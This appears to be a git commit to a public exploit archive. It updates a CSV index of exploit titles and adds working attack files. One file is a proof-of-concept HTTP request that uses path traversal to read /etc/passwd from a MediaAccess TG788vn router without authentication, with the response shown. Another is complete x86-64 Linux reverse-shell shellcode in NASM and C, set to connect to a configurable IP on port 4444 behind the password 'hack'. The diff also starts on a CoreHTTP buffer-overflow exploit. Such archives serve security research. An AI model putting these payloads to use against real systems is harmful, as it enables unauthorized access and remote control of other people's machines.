DB: 2016-01-07

10 new exploits
2016-01-07 05:01:40 +00:00 · 2016-01-07 05:01:40 +00:00 · 53d9096a7c
commit 53d9096a7c
parent cf1ca0a5f7
14 changed files with 1707 additions and 611 deletions
--- a/files.csv
+++ b/files.csv
@ -1505,7 +1505,7 @@ id,file,description,date,author,platform,type,port
 1791,platforms/multiple/remote/1791.patch,"RealVNC 4.1.0 - 4.1.1 - VNC Null Authentication Bypass (Patch EXE)",2006-05-16,redsand,multiple,remote,5900
 1792,platforms/windows/dos/1792.txt,"GNUnet <= 0.7.0d - (Empty UDP Packet) Remote Denial of Service Exploit",2006-05-15,"Luigi Auriemma",windows,dos,0
 1793,platforms/php/webapps/1793.pl,"DeluxeBB <= 1.06 (name) Remote SQL Injection Exploit (mq=off)",2006-05-15,KingOfSka,php,webapps,0
-1794,platforms/multiple/remote/1794.pm,"RealVNC 4.1.0 - 4.1.1 (Null Authentication) Auth Bypass Exploit (meta)",2006-05-15,"H D Moore",multiple,remote,5900
+1794,platforms/multiple/remote/1794.pm,"RealVNC 4.1.0 - 4.1.1 - (Null Authentication) Auth Bypass Exploit (meta)",2006-05-15,"H D Moore",multiple,remote,5900
 1795,platforms/php/webapps/1795.txt,"ezusermanager <= 1.6 - Remote File Inclusion Vulnerability",2006-05-15,OLiBekaS,php,webapps,0
 1796,platforms/php/webapps/1796.php,"PHP-Fusion <= 6.00.306 (srch_where) SQL Injection Exploit",2006-05-16,rgod,php,webapps,0
 1797,platforms/php/webapps/1797.php,"DeluxeBB <= 1.06 (Attachment mod_mime) Remote Exploit",2006-05-16,rgod,php,webapps,0
@ -3888,7 +3888,7 @@ id,file,description,date,author,platform,type,port
 4240,platforms/windows/remote/4240.html,"VMware IntraProcessLogging.dll 5.5.3.42958 - Arbitrary Data Write Exploit",2007-07-28,callAX,windows,remote,0
 4241,platforms/php/webapps/4241.txt,"PHP123 Top Sites (category.php cat) Remote SQL Injection Vuln",2007-07-28,t0pP8uZz,php,webapps,0
 4242,platforms/php/webapps/4242.php,"LinPHA <= 1.3.1 (new_images.php) Remote Blind SQL Injection Exploit",2007-07-29,EgiX,php,webapps,0
-4243,platforms/linux/remote/4243.c,"corehttp 0.5.3alpha (httpd) Remote Buffer Overflow Exploit",2007-07-29,vade79,linux,remote,80
+4243,platforms/linux/remote/4243.c,"CoreHTTP 0.5.3alpha (httpd) - Remote Buffer Overflow Exploit",2007-07-29,vade79,linux,remote,80
 4244,platforms/windows/remote/4244.html,"VMware Inc 6.0.0 (vielib.dll 2.2.5.42958) Remode Code Execution Exploit",2007-07-29,callAX,windows,remote,0
 4245,platforms/windows/remote/4245.html,"VMware Inc 6.0.0 CreateProcess Remote Code Execution Exploit",2007-07-30,callAX,windows,remote,0
 4246,platforms/php/webapps/4246.txt,"wolioCMS Auth Bypass / Remote SQL Injection Vulnerabilities",2007-07-30,k1tk4t,php,webapps,0
@ -7474,7 +7474,7 @@ id,file,description,date,author,platform,type,port
 7940,platforms/php/webapps/7940.txt,"WholeHogSoftware Ware Support (Auth Bypass) SQL Injection Vuln",2009-02-02,ByALBAYX,php,webapps,0
 7941,platforms/php/webapps/7941.txt,"WholeHogSoftware Password Protect (Auth Bypass) SQL Injection Vuln",2009-02-02,ByALBAYX,php,webapps,0
 7942,platforms/windows/dos/7942.pl,"Elecard AVC HD PLAYER (m3u/xpl file) Local Stack Overflow PoC",2009-02-02,AlpHaNiX,windows,dos,0
-7943,platforms/windows/dos/7943.py,"RealVNC 4.1.2 (vncviewer.exe) RFB Protocol Remote Code Execution PoC",2009-02-02,"Andres Luksenberg",windows,dos,0
+7943,platforms/windows/dos/7943.py,"RealVNC 4.1.2 - (vncviewer.exe) RFB Protocol Remote Code Execution PoC",2009-02-02,"Andres Luksenberg",windows,dos,0
 7944,platforms/php/webapps/7944.php,"phpBLASTER 1.0 RC1 (blaster_user) Blind SQL Injection Exploit",2009-02-02,darkjoker,php,webapps,0
 7945,platforms/php/webapps/7945.php,"CMS Mini <= 0.2.2 - Remote Command Execution Exploit",2009-02-02,darkjoker,php,webapps,0
 7946,platforms/php/webapps/7946.txt,"sourdough 0.3.5 - Remote File Inclusion Vulnerability",2009-02-02,ahmadbady,php,webapps,0
@ -9632,7 +9632,7 @@ id,file,description,date,author,platform,type,port
 10345,platforms/windows/local/10345.py,"gAlan - (.galan) Universal Buffer Overflow Exploit",2009-12-07,Dz_attacker,windows,local,0
 10346,platforms/windows/local/10346.rb,"gAlan 0.2.1 - Universal Buffer Overflow Exploit (meta)",2009-12-07,loneferret,windows,local,0
 10347,platforms/hardware/webapps/10347.txt,"Barracuda IMFirewall 620 Vulnerability",2009-12-07,Global-Evolution,hardware,webapps,0
-10349,platforms/linux/dos/10349.py,"CoreHTTP Web server off-by-one Buffer Overflow Vulnerability",2009-12-02,"Patroklos Argyroudis",linux,dos,80
+10349,platforms/linux/dos/10349.py,"CoreHTTP Web server <= 0.5.3.1 - off-by-one Buffer Overflow Vulnerability",2009-12-02,"Patroklos Argyroudis",linux,dos,80
 10350,platforms/php/webapps/10350.txt,"IRAN N.E.T E-commerce Group SQL Injection Vulnerability",2009-12-08,"Dr.0rYX AND Cr3W-DZ",php,webapps,0
 10351,platforms/php/webapps/10351.txt,"MarieCMS 0.9 - LFI & RFI & XSS Vulnerabilities",2009-12-07,"Amol Naik",php,webapps,0
 10352,platforms/hardware/dos/10352.txt,"TANDBERG F8.2 / F8.0 / F7.2 / F6.3 - Remote Denial of Service",2009-12-06,otokoyama,hardware,dos,0
@ -14291,7 +14291,7 @@ id,file,description,date,author,platform,type,port
 16486,platforms/windows/remote/16486.rb,"Novell NetMail <= 3.52d - IMAP AUTHENTICATE Buffer Overflow",2010-05-09,metasploit,windows,remote,0
 16487,platforms/windows/remote/16487.rb,"Ipswitch IMail IMAP SEARCH Buffer Overflow",2010-06-15,metasploit,windows,remote,0
 16488,platforms/windows/remote/16488.rb,"Novell NetMail <= 3.52d IMAP APPEND Buffer Overflow",2010-05-09,metasploit,windows,remote,0
-16489,platforms/windows/remote/16489.rb,"RealVNC 3.3.7 Client Buffer Overflow",2010-04-30,metasploit,windows,remote,0
+16489,platforms/windows/remote/16489.rb,"RealVNC 3.3.7 - Client Buffer Overflow",2010-04-30,metasploit,windows,remote,0
 16490,platforms/windows/remote/16490.rb,"UltraVNC 1.0.1 Client Buffer Overflow",2010-04-30,metasploit,windows,remote,0
 16491,platforms/windows/remote/16491.rb,"WinVNC Web Server <= 3.3.3r7 - GET Overflow",2009-12-06,metasploit,windows,remote,0
 16492,platforms/windows/remote/16492.rb,"Novell iPrint Client ActiveX Control ExecuteRequest debug Buffer Overflow",2010-09-21,metasploit,windows,remote,0
@ -15389,7 +15389,7 @@ id,file,description,date,author,platform,type,port
 17715,platforms/windows/local/17715.html,"F-Secure Multiple Products ActiveX SEH Overwrite Vulnerability (Heap Spray)",2011-08-24,41.w4r10r,windows,local,0
 17716,platforms/php/webapps/17716.txt,"WordPress SendIt plugin <= 1.5.9 - Blind SQL Injection Vulnerability",2011-08-25,evilsocket,php,webapps,0
 17718,platforms/windows/dos/17718.pl,"Groovy Media Player 2.6.0 - (.m3u) Local Buffer Overflow PoC",2011-08-26,"D3r K0n!G",windows,dos,0
-17719,platforms/windows/remote/17719.rb,"RealVNC Authentication Bypass",2011-08-26,metasploit,windows,remote,0
+17719,platforms/windows/remote/17719.rb,"RealVNC - Authentication Bypass",2011-08-26,metasploit,windows,remote,0
 17720,platforms/php/webapps/17720.txt,"WordPress Photoracer plugin <= 1.0 - SQL Injection Vulnerability",2011-08-26,evilsocket,php,webapps,0
 17721,platforms/windows/remote/17721.rb,"Sunway Force Control SCADA 6.1 SP3 httpsrv.exe Exploit",2011-08-26,"Canberk BOLAT",windows,remote,0
 17722,platforms/php/webapps/17722.rb,"Jcow Social Networking Script 4.2 <= 5.2 - Arbitrary Code Execution",2011-08-26,"Aung Khant",php,webapps,0
@ -15648,7 +15648,7 @@ id,file,description,date,author,platform,type,port
 18012,platforms/multiple/webapps/18012.txt,"Metasploit 4.1.0 Web UI stored XSS Vulnerability",2011-10-20,"Stefan Schurtz",multiple,webapps,0
 18013,platforms/windows/webapps/18013.py,"Cyclope Internet Filtering Proxy 4.0 - Stored XSS",2011-10-20,loneferret,windows,webapps,0
 18014,platforms/windows/dos/18014.html,"Opera <= 11.51 Use After Free Crash PoC",2011-10-21,"Roberto Suggi Liverani",windows,dos,0
-18015,platforms/cgi/remote/18015.rb,"HP Power Manager 'formExportDataLogs' Buffer Overflow",2011-10-20,metasploit,cgi,remote,0
+18015,platforms/cgi/remote/18015.rb,"HP Power Manager - 'formExportDataLogs' Buffer Overflow",2011-10-20,metasploit,cgi,remote,0
 18016,platforms/windows/remote/18016.txt,"Oracle AutoVue 20.0.1 AutoVueX - ActiveX Control SaveViewStateToFile Vulnerability",2011-10-21,rgod,windows,remote,0
 18017,platforms/windows/dos/18017.py,"Cyclope Internet Filtering Proxy 4.0 - CEPMServer.exe DoS (Poc)",2011-10-21,loneferret,windows,dos,0
 18018,platforms/php/webapps/18018.php,"Sports PHool <= 1.0 - Remote File Include Exploit",2011-10-21,"cr4wl3r ",php,webapps,0
@ -16881,7 +16881,7 @@ id,file,description,date,author,platform,type,port
 19512,platforms/linux/local/19512.sh,"Mandriva Linux Mandrake 6.0_Gnome Libs 1.0.8 espeaker - Local Buffer Overflow",1999-09-26,"Brock Tellier",linux,local,0
 19513,platforms/hardware/dos/19513.txt,"Eicon Networks DIVA LAN ISDN Modem 1.0 Release 2.5/1.0/2.0 - DoS",1999-09-27,"Bjorn Stickler",hardware,dos,0
 19514,platforms/windows/remote/19514.txt,"Adobe Acrobat ActiveX Control 1.3.188 - ActiveX Buffer Overflow",1999-09-27,"Shane Hird",windows,remote,0
-19515,platforms/windows/remote/19515.txt,"Microsoft Internet Explorer 4.0 for Windows 95/Windows NT 4 Setupctl ActiveX Control Buffer Overflow",1999-09-27,"Shane Hird",windows,remote,0
+19515,platforms/windows/remote/19515.txt,"Microsoft Internet Explorer 4.0 for Windows 95/Windows NT 4 - Setupctl ActiveX Control Buffer Overflow",1999-09-27,"Shane Hird",windows,remote,0
 19516,platforms/windows/local/19516.txt,"Microsoft MSN Messenger Service 1.0 Setup BBS ActiveX Control Buffer Overflow",1999-09-27,"Shane Hird",windows,local,0
 19517,platforms/linux/local/19517.pl,"Emesene 2.12.5 - Password Disclosure",2012-07-01,"Daniel Godoy",linux,local,0
 19793,platforms/php/webapps/19793.txt,"Magento eCommerce Local File Disclosure",2012-07-13,"SEC Consult",php,webapps,0
@ -30264,7 +30264,7 @@ id,file,description,date,author,platform,type,port
 33549,platforms/linux/dos/33549.txt,"OpenOffice 3.1 - (.slk) NULL Pointer Dereference Remote Denial of Service Vulnerability",2010-01-19,"Hellcode Research",linux,dos,0
 33550,platforms/php/webapps/33550.txt,"VisualShapers ezContents <= 2.0.3 - Authentication Bypass and Multiple SQL Injection Vulnerabilities",2010-01-19,"AmnPardaz Security Research Team",php,webapps,0
 33551,platforms/php/webapps/33551.txt,"PHPMySpace Gold 8.0 - 'gid' Parameter SQL Injection Vulnerability",2010-01-20,Ctacok,php,webapps,0
-33552,platforms/windows/remote/33552.txt,"Microsoft Internet Explorer 8 URI Validation Remote Code Execution Vulnerability",2010-01-21,"Lostmon Lords",windows,remote,0
+33552,platforms/windows/remote/33552.txt,"Microsoft Internet Explorer 8 - URI Validation Remote Code Execution Vulnerability",2010-01-21,"Lostmon Lords",windows,remote,0
 33553,platforms/multiple/remote/33553.txt,"Sun Java System Web Server 6.1/7.0 Digest Authentication Remote Buffer Overflow Vulnerability",2010-01-21,Intevydis,multiple,remote,0
 33554,platforms/linux/remote/33554.py,"TORQUE Resource Manager 2.5.x-2.5.13 - Stack Based Buffer Overflow Stub",2014-05-28,bwall,linux,remote,0
 33555,platforms/php/webapps/33555.txt,"AuraCMS 3.0 - Multiple Vulnerabilities",2014-05-28,"Mustafa ALTINKAYNAK",php,webapps,0
@ -32648,7 +32648,7 @@ id,file,description,date,author,platform,type,port
 36206,platforms/windows/remote/36206.rb,"Persistent Systems Client Automation Command Injection RCE",2015-02-27,"Ben Turner",windows,remote,3465
 36207,platforms/windows/local/36207.py,"Microsoft Office Word 2007 - RTF Object Confusion (ASLR and DEP Bypass)",2015-02-28,R-73eN,windows,local,0
 36208,platforms/php/webapps/36208.txt,"vtiger CRM 5.2 'onlyforuser' Parameter SQL Injection Vulnerability",2011-10-15,"Aung Khant",php,webapps,0
-36209,platforms/windows/remote/36209.html,"Microsoft Internet Explorer 8 Select Element Memory Corruption Vulnerability",2011-10-11,"Ivan Fratric",windows,remote,0
+36209,platforms/windows/remote/36209.html,"Microsoft Internet Explorer 8 - Select Element Memory Corruption Vulnerability",2011-10-11,"Ivan Fratric",windows,remote,0
 36262,platforms/windows/webapps/36262.txt,"Solarwinds Orion Service - SQL Injection Vulnerabilities",2015-03-04,"Brandon Perry",windows,webapps,0
 36263,platforms/linux/remote/36263.rb,"Symantec Web Gateway 5 restore.php Post Authentication Command Injection",2015-03-04,metasploit,linux,remote,443
 36211,platforms/windows/dos/36211.txt,"Microsoft Host Integration Server 2004-2010 - Remote Denial Of Service Vulnerability",2011-04-11,"Luigi Auriemma",windows,dos,0
@ -33335,7 +33335,7 @@ id,file,description,date,author,platform,type,port
 36929,platforms/jsp/webapps/36929.txt,"Ilient SysAid 8.5.5 Multiple Cross Site Scripting and HTML Injection Vulnerabilities",2012-03-08,"Julien Ahrens",jsp,webapps,0
 36930,platforms/multiple/webapps/36930.txt,"Wordpress Freshmail Unauthenticated SQL Injection",2015-05-07,"Felipe Molina",multiple,webapps,0
 36931,platforms/hardware/remote/36931.txt,"Barracuda CudaTel Communication Server 2.0.029.1 Multiple HTML Injection Vulnerabilities",2012-03-08,"Benjamin Kunz Mejri",hardware,remote,0
-36932,platforms/windows/remote/36932.py,"RealVNC 4.1.0 and 4.1.1 Authentication Bypass Exploit",2012-05-13,fdiskyou,windows,remote,5900
+36932,platforms/windows/remote/36932.py,"RealVNC 4.1.0 and 4.1.1 - Authentication Bypass Exploit",2012-05-13,fdiskyou,windows,remote,5900
 36933,platforms/linux/remote/36933.py,"ShellShock dhclient Bash Environment Variable Command Injection PoC",2014-09-29,fdiskyou,linux,remote,0
 36934,platforms/asp/webapps/36934.txt,"SAP Business Objects InfoVew System listing.aspx searchText Parameter XSS",2012-03-08,vulns@dionach.com,asp,webapps,0
 36935,platforms/asp/webapps/36935.txt,"SAP Business Objects InfoView System /help/helpredir.aspx guide Parameter XSS",2012-03-08,vulns@dionach.com,asp,webapps,0
@ -35399,13 +35399,15 @@ id,file,description,date,author,platform,type,port
 39145,platforms/cgi/webapps/39145.txt,"Xangati XSR And XNR 'gui_input_test.pl' Remote Command Execution Vulnerability",2014-04-14,"Jan Kadijk",cgi,webapps,0
 39146,platforms/php/webapps/39146.txt,"Jigowatt PHP Event Calendar 'day_view.php' SQL Injection Vulnerability",2014-04-14,"Daniel Godoy",php,webapps,0
 39147,platforms/osx/local/39147.c,"Apple Mac OS X Local Security Bypass Vulnerability",2014-04-22,"Ian Beer",osx,local,0
 39150,platforms/php/webapps/39150.txt,"Open Audit SQL Injection Vulnerability",2016-01-02,"Rahul Pratap Singh",php,webapps,0
 39151,platforms/lin_x86-64/shellcode/39151..c,"x86_64 Linux bind TCP port shellcode",2016-01-02,Scorpion_,lin_x86-64,shellcode,0
-39152,platforms/linux/shellcode/39152..c,"tcp bindshell with password prompt in 162 bytes",2016-01-02,"Sathish kumar",linux,shellcode,0
+39152,platforms/linux/shellcode/39152..c,"TCP Bindshell with Password Prompt - 162 bytes",2016-01-02,"Sathish kumar",linux,shellcode,0
 39153,platforms/php/webapps/39153.txt,"iDevAffiliate 'idevads.php' SQL Injection Vulnerability",2014-04-22,"Robert Cooper",php,webapps,0
 39154,platforms/hardware/remote/39154.txt,"Comtrend CT-5361T Router password.cgi Admin Password Manipulation CSRF",2014-04-21,"TUNISIAN CYBER",hardware,remote,0
 39155,platforms/linux/remote/39155.txt,"lxml 'clean_html' Function Security Bypass Vulnerability",2014-04-15,"Maksim Kochkin",linux,remote,0
 39156,platforms/cgi/webapps/39156.txt,"ZamFoo Multiple Remote Command Execution Vulnerabilities",2014-04-02,Al-Shabaab,cgi,webapps,0
 39157,platforms/php/webapps/39157.txt,"Puntopy 'novedad.php' SQL Injection Vulnerability",2014-04-06,"Felipe Andrian Peixoto",php,webapps,0
 39159,platforms/windows/local/39159.py,"FTPShell Client 5.24 - Add to Favorites Buffer Overflow",2016-01-04,INSECT.B,windows,local,0
 39161,platforms/windows/remote/39161.py,"Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution",2016-01-04,"Avinash Thapa",windows,remote,0
 39162,platforms/multiple/dos/39162.txt,"pdfium CPDF_DIBSource::DownSampleScanline32Bit - Heap-Based Out-of-Bounds Read",2016-01-04,"Google Security Research",multiple,dos,0
 39163,platforms/multiple/dos/39163.txt,"pdfium CPDF_TextObject::CalcPositionData - Heap-Based Out-of-Bounds Read",2016-01-04,"Google Security Research",multiple,dos,0
@ -35422,3 +35424,11 @@ id,file,description,date,author,platform,type,port
 39175,platforms/multiple/remote/39175.py,"AssistMyTeam Team Helpdesk Multiple Information Disclosure Vulnerabilities",2014-05-05,bhamb,multiple,remote,0
 39176,platforms/php/webapps/39176.html,"TOA Cross Site Request Forgery Vulnerability",2014-05-08,"High-Tech Bridge",php,webapps,0
 39177,platforms/multiple/dos/39177.py,"VLC Media Player '.wav' File Memory Corruption Vulnerability",2014-05-09,"Aryan Bayaninejad",multiple,dos,0
 39178,platforms/php/webapps/39178.txt,"CMS Touch pages.php Page_ID Parameter SQL Injection",2014-05-08,indoushka,php,webapps,0
 39179,platforms/php/webapps/39179.txt,"CMS Touch news.php News_ID Parameter SQL Injection",2014-05-08,indoushka,php,webapps,0
 39180,platforms/windows/dos/39180.pl,"Winamp '.flv' File Processing Memory Corruption Vulnerability",2014-05-16,"Aryan Bayaninejad",windows,dos,0
 39181,platforms/windows/dos/39181.py,"Intel Indeo Video Memory Corruption Vulnerability",2014-05-16,"Aryan Bayaninejad",windows,dos,0
 39182,platforms/multiple/dos/39182.py,"RealPlayer '.3gp' File Processing Memory Corruption Vulnerability",2014-05-16,"Aryan Bayaninejad",multiple,dos,0
 39183,platforms/windows/dos/39183.py,"ALLPlayer '.wav' File Processing Memory Corruption Vulnerability",2014-05-16,"Aryan Bayaninejad",windows,dos,0
 39184,platforms/hardware/webapps/39184.txt,"MediaAccess TG788vn - Unauthenticated File Disclosure",2016-01-06,0x4148,hardware,webapps,0
 39185,platforms/lin_x86-64/shellcode/39185.c,"TCP Reverse Shell with Password Prompt - 151 bytes",2016-01-06,"Sathish kumar",lin_x86-64,shellcode,0
--- a/platforms/hardware/webapps/39184.txt
+++ b/platforms/hardware/webapps/39184.txt
@ -0,0 +1,32 @@
 Vulnerable hardware : MediaAccess TG788vn with Cisco http firewall
 Author : Ahmed Sultan (0x4148)
 Email : 0x4148@gmail.com
 MediaAccess TG788vn with Cisco firewall http config is vulnerable to
 critical unauthenticated file disclosure flaw,
 POC
 Request:
 POST /scgi-bin/platform.cgi HTTP/1.1
 Host: xx.xx.xx.xx
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate, br
 Referer: https://xx.xx.xx.xx/scgi-bin/platform.cgi
 Connection: keep-alive
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 164
 button.login.home=Se%20connecter&Login.userAgent=0x4148_Fu&reload=0&SSLVPNUser.Password=0x4148Fu&SSLVPNUser.UserName=0x4148&thispage=../../../../../../etc/passwd%00
 Response:
 HTTP/1.0 200 OK
 Date: Sat, 01 Jan 2011 00:00:45 GMT
 Server: Embedded HTTP Server.
 Connection: close
 loic_ipsec:x:500:500:xauth:/:/bin/cli
 the http server is running with root privileges , which mean that the
 attacker might escalate the exploit for further critical attacks
--- a/platforms/lin_x86-64/shellcode/39185.c
+++ b/platforms/lin_x86-64/shellcode/39185.c
@ -0,0 +1,184 @@
 /*---------------------------------------------------------------------------------------------------------------------
 /*
 *Title:            tcp reverse shell with password prompt in 151 bytes 
 *Author:           Sathish kumar
 *Contact:          https://www.linkedin.com/in/sathish94
 * Copyright:        (c) 2016 iQube. (http://iQube.io)
 * Release Date:     January 6, 2016
 *Description:      x64 Linux reverse TCP port shellcode on port 4444 with reconfigurable password
 *Tested On:        Ubuntu 14.04 LTS
 *SLAE64-1408
 *Build/Run:        gcc -fno-stack-protector -z execstack bindshell.c -o bindshell
 *                   ./bindshell
 *                   nc localhost 4444
 * 
 */
 /* 
 * NOTE: This C code binds on port 4444 
 * The top of this file contains the .nasm source code
 * The Port can be Reconfigured According to your needs
 * Instructions for changing port number
 * Port obtainer change the port value accorddingly
 *  					port.py
 *          				import socket
 *		   				port = 4444
 *          				hex(socket.htons(port))
 *  					python port.py 
 *  					Result : 0x5c11 
 * Replace the obtained value in the shellcode to change the port number
 * For building the from .nasm source use
 * 					nasm -felf64 filename.nasm -o filename.o
 * 					ld filename.o -o filename
 * To inspect for nulls
 * 					objdump -M intel -D filename.o
 global _start
 _start:
    jmp sock
 	prompt: db 'Passcode' ; initilization of prompt data
   	; sock = socket(AF_INET, SOCK_STREAM, 0)
 	; AF_INET = 2
 	; SOCK_STREAM = 1
 	; syscall number 41 
 sock:
 	xor rax, rax    ;Xor function will null the values in the register beacuse we doesn't know whats the value in the register in realtime cases
 	xor rsi, rsi 
 	mul rsi       
 	push byte 0x2   ;pusing argument to the stack
 	pop rdi         ; poping the argument to the rdi instructions on the top of the stack should be remove first because stack LIFO
 	inc esi         ; already rsi is 0 so incrementing the rsi register will make it 1
 	push byte 0x29  ; pushing the syscall number into the rax by using stack
 	pop rax
 	syscall
 	; copying the socket descripter from rax to rdi register so that we can use it further 
 	xchg rax, rdi
 	; server.sin_family = AF_INET 
 	; server.sin_port = htons(PORT)
 	; server.sin_addr.s_addr = INADDR_ANY
 	; bzero(&server.sin_zero, 8)
 	; setting up the data sctructure
 	xor rax, rax
 	push rax                         ; bzero(&server.sin_zero, 8)
 	mov ebx , 0xfeffff80             ; ip address 127.0.0.1 "noted" to remove null
 	not ebx
 	mov dword [rsp-4], ebx
 	sub rsp , 4                      ; adjust the stack
 	push word 0x5c11                 ; port 4444 in network byte order
 	push word 0x02                   ; AF_INET
 	push rsp
 	pop rsi
    ; connecting to the remote ip
    push 0x2a
    pop rax
    push 0x10
    pop rdx
    syscall
 	; initilization of dup2
 	push 0x3                           
 	pop rsi								; setting argument to 3 
 duplicate:
    dec esi                            
    mov al, 0x21                       ;duplicate syscall applied to error,output and input using loop
    syscall
    jne duplicate
 xor rax, rax                      
 	inc al                             ; rax register to value 1 syscall for write
 	push rax	
 	pop rdi							   ; rdi register to value 1
 	lea rsi, [rel prompt]
 	xor rdx, rdx                       ; xor the rdx register to clear the previous values
 	push 0xe
 	pop rdx
 	syscall
 									   ; checking the password using read
 password_check:
 	push rsp
 	pop rsi
 	xor rax, rax   ; system read syscall value is 0 so rax is set to 0
 	syscall
 	push 0x6b636168 ; password to connect to shell is hack which is pushed in reverse and hex encoded
 	pop rax
 	lea rdi, [rel rsi]
 	scasd           ; comparing the user input and stored password in the stack
 	jne Exit	  
 execve:                                      ; Execve format  , execve("/bin/sh", 0 , 0)
     xor rsi , rsi
     mul rsi                                 ; zeroed rax , rdx register 
     push ax                                 ; terminate string with null
     mov rbx , 0x68732f2f6e69622f            ; "/bin//sh"  in reverse order 
     push rbx
     push rsp
     pop rdi                                 ; set RDI
     push byte 0x3b                          ; execve syscall number (59)
     pop rax
     syscall
 Exit:
 	 ;Exit shellcode if password is wrong
 	 push 0x3c
 	 pop rax        ;syscall number for exit is 60
 	 xor rdi, rdi 
 	 syscall
 */ 
 #include<stdio.h>
 #include<string.h>
 unsigned char code[] = \
 "\xeb\x08\x50\x61\x73\x73\x63\x6f\x64\x65\x48\x31\xc0\x48\x31\xf6\x48\xf7\xe6\x6a\x02\x5f\xff\xc6\x6a\x29\x58\x0f\x05\x48\x97\x48\x31\xc0\x50\xbb"
 //ip address which can be obtained by
 /*			example 10.1.75.202
 * 			hex value equivalent =  0a.01.4b.ca
 */
 //replace this with the ip address of the system to which the shell should connect
 "\x0a\x01\x4b\xca"
 "\x89\x5c\x24\xfc\x48\x83\xec\x04\x66\x68"
 //Port number this can be obtained from the above instrcutions
 "\x11\x5c"
 "\x66\x6a\x02\x54\x5e\x6a\x2a\x58\x6a\x10\x5a\x0f\x05\x6a\x03\x5e\xff\xce\xb0\x21\x0f\x05\x75\xf8\x48\x31\xc0\xfe\xc0\x50\x5f\x48\x8d\x35\xa8\xff\xff\xff\x48\x31\xd2\x6a\x0e\x5a\x0f\x05\x54\x5e\x48\x31\xc0\x0f\x05\x68"
 //Password this can be obtained by
 /*
 * python 
 * 			password = 'hack' 
 * 			(password[::-1]).encode('hex')
 * 			Reuslt : 6b636168 
 * 	This is stored in reverse beacuse of stack
 * 
 * 
 */ 
 "\x68\x61\x63\x6b"
 "\x58\x48\x8d\x3e\xaf\x75\x1a\x48\x31\xf6\x48\xf7\xe6\x66\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\x6a\x3b\x58\x0f\x05\x6a\x3c\x58\x48\x31\xff\x0f\x05";
 main()
 {
 	printf("Shellcode Length:  %d\n", (int)strlen(code));
 	int (*ret)() = (int(*)())code;
 	ret();
 }
--- a/platforms/linux/remote/4243.c
+++ b/platforms/linux/remote/4243.c
@ -1,332 +1,332 @@
-/*[ corehttp[v0.5.3alpha]: httpd remote buffer overflow exploit. ]**********
+/*[ corehttp[v0.5.3alpha]: httpd remote buffer overflow exploit. ]**********
- *                                                                         *
+ *                                                                         *
- * by: vade79/v9 v9@fakehalo.us (fakehalo/realhalo)                        *
+ * by: vade79/v9 v9@fakehalo.us (fakehalo/realhalo)                        *
- *                                                                         *
+ *                                                                         *
- * compile:                                                                *
+ * compile:                                                                *
- *  gcc xcorehttp.c -o xcorehttp                                           *
+ *  gcc xcorehttp.c -o xcorehttp                                           *
- *                                                                         *
+ *                                                                         *
- * syntax:                                                                 *
+ * syntax:                                                                 *
- *  ./xcorehttp [-r] -h host -p port                                       *
+ *  ./xcorehttp [-r] -h host -p port                                       *
- *                                                                         *
+ *                                                                         *
- * corehttp homepage/url:                                                  *
+ * corehttp homepage/url:                                                  *
- *  http://corehttp.sourceforge.net/                                       *
+ *  http://corehttp.sourceforge.net/                                       *
- *                                                                         *
+ *                                                                         *
- * bug(http.c):                                                            *
+ * bug(http.c):                                                            *
- * ----------------------------------------------------------------------- *
+ * ----------------------------------------------------------------------- *
- * struct sprock_t *HttpSprockMake(struct sprock_t *parentsprock) {        *
+ * struct sprock_t *HttpSprockMake(struct sprock_t *parentsprock) {        *
- *     struct sprock_t *sprocket;                                          *
+ *     struct sprock_t *sprocket;                                          *
- *     char req[PATHSIZE], url[PATHSIZE], status[PATHSIZE], temp[BUFSIZE], *
+ *     char req[PATHSIZE], url[PATHSIZE], status[PATHSIZE], temp[BUFSIZE], *
- * ...                                                                     *
+ * ...                                                                     *
- *     if ((sprocket = (struct sprock_t *)                                 *
+ *     if ((sprocket = (struct sprock_t *)                                 *
- *          malloc(sizeof(struct sprock_t))) == NULL) return NULL;         *
+ *          malloc(sizeof(struct sprock_t))) == NULL) return NULL;         *
- * ...                                                                     *
+ * ...                                                                     *
- *     sscanf(parentsprock->buffer, "%[A-Za-z] %s%*[ \t\n]", req, url);    *
+ *     sscanf(parentsprock->buffer, "%[A-Za-z] %s%*[ \t\n]", req, url);    *
- * !(the bug/overwrite) --------------------------------------^----^       *
+ * !(the bug/overwrite) --------------------------------------^----^       *
- *     strncpy(sprocket->parent->url, url, PATHSIZE);                      *
+ *     strncpy(sprocket->parent->url, url, PATHSIZE);                      *
- * !(the problem) -^                                                       *
+ * !(the problem) -^                                                       *
- * ...                                                                     *
+ * ...                                                                     *
- *     for (i = 0; req[i] != '\0'; i++)                                    *
+ *     for (i = 0; req[i] != '\0'; i++)                                    *
- *         req[i] = toupper(req[i]);                                       *
+ *         req[i] = toupper(req[i]);                                       *
- * !(another problem) -^                                                   *
+ * !(another problem) -^                                                   *
- * ...                                                                     *
+ * ...                                                                     *
- * }                                                                       *
+ * }                                                                       *
- * ----------------------------------------------------------------------- *
+ * ----------------------------------------------------------------------- *
- *                                                                         *
+ *                                                                         *
- * explaination:                                                           *
+ * explaination:                                                           *
- *  the sscanf() call in the above code contains no bounds checks for      *
+ *  the sscanf() call in the above code contains no bounds checks for      *
- *  writing to either req[] or url[] (i chose url[] as it gave more room   *
+ *  writing to either req[] or url[] (i chose url[] as it gave more room   *
- *  to work with, by overwriting into req[], and isnt limited to           *
+ *  to work with, by overwriting into req[], and isnt limited to           *
- *  alphabetical characters only)                                          *
+ *  alphabetical characters only)                                          *
- *                                                                         *
+ *                                                                         *
- *  the first problem is that this overflows into the *sprocket structure  *
+ *  the first problem is that this overflows into the *sprocket structure  *
- *  pointer, which is used immediately after the overflow.  this is        *
+ *  pointer, which is used immediately after the overflow.  this is        *
- *  automatically calculated in this exploit, using the same location in   *
+ *  automatically calculated in this exploit, using the same location in   *
- *  memory with an offset. (+512 to ret address, which points to the nops) *
+ *  memory with an offset. (+512 to ret address, which points to the nops) *
- *                                                                         *
+ *                                                                         *
- *  the second problem is all lowercase characters get uppercased, this    *
+ *  the second problem is all lowercase characters get uppercased, this    *
- *  will happen weither or not you overwrite via req[] or url[].  if the   *
+ *  will happen weither or not you overwrite via req[] or url[].  if the   *
- *  return address contains a lowercase character it will uppercase it.    *
